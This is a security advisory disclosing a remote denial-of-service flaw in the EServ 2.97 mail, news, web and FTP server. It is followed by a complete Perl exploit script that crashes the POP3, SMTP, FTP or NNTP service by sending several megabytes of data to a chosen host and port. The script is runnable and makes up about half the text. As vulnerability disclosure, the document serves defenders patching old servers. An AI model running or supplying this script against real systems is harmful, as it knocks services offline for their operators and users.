EServ/2.97 remote DoS

[D4rkGr3y <grey_1999 () mail ru>]

#####################################################*
#      Damage Hacking Group security advisory
#                 www.dhgroup.org
#####################################################*
#Product: EServ/2.97
#Authors: Etype Co. [www.eserv.ru]
#Vulnerable versions: up to v.2.97, may be 2.98
#Not vulnerable versions: v.2.99
#Vulnerability: remote DoS
#####################################################*

#Overview#--------------------------------------------------------------#
> From EServ's 'readme' file:
"Eserv/2.97 - mail, news, web, ftp and proxy server.
It includes:

- SMTP, POP3, NNTP -servers
- caching HTTP/FTP proxy 
- HTTP server (maintaining virtual servers)
- FTP server (with download and upload resuming support)
- FTP-gate
- Socks5, Socks4 and 4a proxy
- TCP и UDP mapping proxy
- Finger-server"

#Problem#---------------------------------------------------------------#
We founded 4 bugs, that allows to kill EServ by sending data with a
very large size. FTP - 5005312b, POP3 - 4950001b, SMTP - 4960000b,
NNTP - 5001216b. This is not buffer overflow, so it's impossible to use
this bugs for privelege escalation or something like this.

#Fix#--------------------------------------------------------------------#
Download new verion from www.eserv.ru. EServ/2.99 _is_not_vulnerable_.

#Exploit#----------------------------------------------------------------#

#!/usr/bin/perl
######################################################
#EServ/2.97 remote DoS xsploit
#Bugs founded in v.2.97 but I think that 2.98 is
#vulnerable too.
#################
#Usage: perl EServ.DoS.pl [host] [port] [service_type]
#Where 'service_type' - service to attack (pop, smtp, ftp, nntp)
#Example: perl EServ.DoS.pl localhost 110 pop
#################
#If something wrong or u wanna to discuss something,
#contact me: "D4rkGr3y" <grey_1999 () mail ru> icq: 540981
#######################################################
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
$param = $ARGV[2];
$data = "a";
print "\n\n";;
print "#Product: EServ/2.97 - www.eserv.ru\n";
print "#Vuln: remote DoS\n";
print "#Xsploit by D4rkGr3y\n";
print "#Warning: if u use dial-up connection, attack can take a few time.\n\n";
if ($param) {
$num = "4950001" if $param eq "pop";
$num = "4960000" if $param eq "smtp";
$num = "5005312" if $param eq "ftp";
$num = "5001215" if $param eq "nntp";
die "Error in params\n" if !$num;
print "Connecting...";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die 
"Socket
error.\n";
print "OK\n";
$buf .= $data x $num;
print "Attacking...";
print $socket "$buf\n";
print "OK\n\n";
print "Vizit us at www.dhgroup.org";
close($socket);
} else {
  print "Error in Params.\n";
  print "Usage: perl EServ.DoS.pl [host] [port] [service_type]\n";
  print "Where 'service_type' - service to attack (pop, smtp, ftp, nntp)\n";
  print "Example: perl EServ.DoS.pl 127.0.0.1 110 pop\n";
  exit;
}

#EOF

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981